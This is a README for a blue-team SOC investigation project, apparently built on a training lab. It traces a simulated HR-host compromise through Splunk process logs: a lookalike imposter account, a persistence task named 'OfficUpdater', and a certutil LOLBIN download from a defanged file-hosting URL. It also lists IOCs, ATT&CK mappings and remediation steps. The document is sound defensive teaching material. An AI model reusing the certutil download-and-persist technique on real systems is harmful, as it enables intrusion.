This repository documents a hands-on SOC investigation focused on identifying, analyzing, and responding to suspicious process execution activity on a host within the HR department. The project follows a real-world Blue Team workflow, including log ingestion, alert triage, user behavior analysis, LOLBIN and scheduled task investigation, network activity analysis, and threat intelligence correlation.
An IDS alert indicated suspicious process execution on a host in the HR department, suggesting a potential compromise. Analysis revealed the execution of tools commonly associated with network information gathering and scheduled task creation, confirming malicious behavior.
Due to limited resources, only Windows process creation logs (Event ID 4688) were collected and ingested into Splunk under the win_eventlogs index for further investigation.
The organization’s network is divided into three departments:
IT Department
- James
- Moin
- Katrina
HR Department
- Haroon
- Chris
- Diana
Marketing Department
- Bell
- Amelia
- Deepak
This segmentation was used to correlate suspicious activity to specific departments and users during the investigation.
This project focuses on the full investigation and triage of suspicious process execution to determine whether it represents legitimate activity or malicious compromise within the HR department host.
Investigation Workflow Overview:
- 🖥️ Log Collection & Ingestion – Gather Windows process execution logs (Event ID 4688) and ingest them into Splunk for structured analysis
- 🔍 Alert Analysis & Triage – Review IDS alerts to identify hosts and processes of interest
- 👤 User Activity Correlation – Map observed activity to network segmentation and departmental users to detect anomalous behavior and imposters
- 🛠️ Scheduled Task & LOLBIN Investigation – Identify execution of Living-off-the-Land Binaries (LOLBINs) and scheduled tasks used for reconnaissance or payload delivery
- 🌐 Network & Host Analysis – Determine which third-party sites were accessed, files downloaded, and endpoint artifacts present
- 📂 Artifact Collection & Evidence Documentation – Extract downloaded files, record filenames, hashes, and other indicators of compromise for further triage
- 📑 Reporting & MITRE ATT&CK Mapping – Document investigation findings, correlate with MITRE ATT&CK tactics and techniques, and provide actionable recommendations
All analysis was performed in a controlled environment to ensure safe handling of potentially malicious content.
- Splunk: SIEM platform used for log ingestion, querying, and correlation
- Windows Event Logs: Primary source of process execution information (Event ID 4688)
- Vim / Text Editors: Used to review raw log data and extract relevant information
Oracle VirtualBox: Provided an isolated sandbox environment for safely handling and analyzing potentially malicious files and logs.
Splunk Query Editor: Used to build, test, and refine SPL queries for analysis of event logs and alert correlation.
Browser / Network Tools: Standard browsers and online tools (e.g., VirusTotal, WHOIS lookups) used for network artifact investigation, IP reputation, and malware source verification.
- Total number of process execution logs ingested for March 2022:
[13,959] - Query used: 📄 Detailed query explanation see Splunk_Queries/01_log_ingestion_explained.md
- IDS alert identified suspicious process execution on HR host
- Suspicious Username Observed:
[Amel1a] - Timeline of suspicious processes:
[3/5/22 12:54:30.000 PM]- Query used:📄 Detailed query explanation: see Splunk_Queries/02_imposter_account_detection.md
- HR user observed running scheduled tasks:
[Chris.fort] - Query used:📄 Detailed query explanation: see Splunk_Queries/03_scheduled_task_hr_user.md
- HR user executing LOLBIN to download payload:
[Haroon] - System process (LOLBIN) used:
[Certutil.exe] - Query used:📄 Detailed query explanation: see Splunk_Queries/04_lolbin_payload_download.md
- Third-party site accessed:
[Controlc.com] - URL connected to by infected host:
[hxxps://controlc[.]com/e4d11035 ] - Query used:📄 Detailed query explanation: see Splunk_Queries/05_Network_Analysis.md
- Date of binary execution:
[3/4/22 10:38:28.000 AM] - File saved on host from C2 server:
[Benign.exe] - Query used:📄 Detailed query explanation: see Splunk_Queries/06_Host_Analysis.md
- Imposter Username: Amel1a
- Legitimate Lookalike Username: Amelia
- Compromised User Account: Chris.fort
- Compromised User Account: Haroon
- Affected Department: Human Resources (HR)
- Affected Host: HR_02
- Malicious Scheduled Task Name: OfficUpdater
- Persistence Mechanism: Windows Scheduled Task (schtasks)
- LOLBIN Used: certutil.exe
- Downloaded Payload Name: Benign.exe
- Payload Execution Date: 2022-03-04
- Payload Execution Time: 10:38:28 AM
- External Domain Contacted: controlc[.]com
- External URL: https://controlc[.]com/e4d11035
- Payload Source Type: Third-party file hosting service
- Log Source: Windows Event Logs (Event ID 4688)
- T1036 – Masquerading
Imposter accountAmel1aclosely resembled a legitimate user (Amelia), indicating account masquerading. - T1078 – Valid Accounts
Legitimate HR user accounts (Chris.fort,Haroon) were used to execute malicious activity. - T1053.005 – Scheduled Task / Job: Scheduled Task
A scheduled task (OfficUpdater) was created to establish persistence and execute a malicious binary on system startup. - T1218 – Signed Binary Proxy Execution
The native Windows utilitycertutil.exewas abused as a Living-off-the-Land Binary (LOLBIN) to bypass security controls. - T1105 – Ingress Tool Transfer
A payload (benign.exe) was downloaded from an external source usingcertutil.exe. - T1071 – Application Layer Protocol
The infected host communicated with a third-party web service (controlc[.]com) over HTTP(S).
The investigation confirmed that the suspicious process execution activity observed on HR department hosts was the result of a confirmed compromise. Analysis of Windows process creation logs (Event ID 4688) revealed multiple stages of attacker activity, including account masquerading, persistence establishment, and malicious payload delivery using native system utilities.
A suspicious imposter account (Amel1a) was identified during log review, closely resembling a legitimate user account (Amelia). Further analysis revealed abuse of valid HR user accounts (Chris.fort and Haroon) to execute scheduled tasks and download an external payload using the Living-off-the-Land Binary certutil.exe. The payload was retrieved from a third-party file-sharing service and successfully written to disk, confirming post-compromise activity.
Based on the collected evidence, the following actions are recommended:
- Immediate account remediation: Reset passwords and review access privileges for all affected and related HR user accounts, including monitoring for additional imposter or lookalike usernames.
- Persistence eradication: Identify and remove unauthorized scheduled tasks, including the task named
OfficUpdater, and verify system startup configurations across HR hosts. - LOLBIN abuse prevention: Restrict or monitor execution of high-risk native utilities such as
certutil.exethrough endpoint protection policies and application control. - Network containment: Block identified external infrastructure, including the defanged domain
controlc[.]comand associated URLs, at network security and proxy layers. - Threat detection enhancement: Create and deploy SIEM correlation rules to detect scheduled task creation, certutil-based downloads, and execution of binaries from temporary user directories.
- Post-incident monitoring: Increase monitoring across HR department systems for signs of lateral movement, repeated execution attempts, or additional payload retrieval.
The incident was successfully investigated and documented using available host-based telemetry. All identified Indicators of Compromise (IOCs), including user accounts, command-line artifacts, file names, and external URLs, have been preserved for SOC reporting and future detection. The case has been formally closed following validation of findings and implementation of recommended remediation actions.






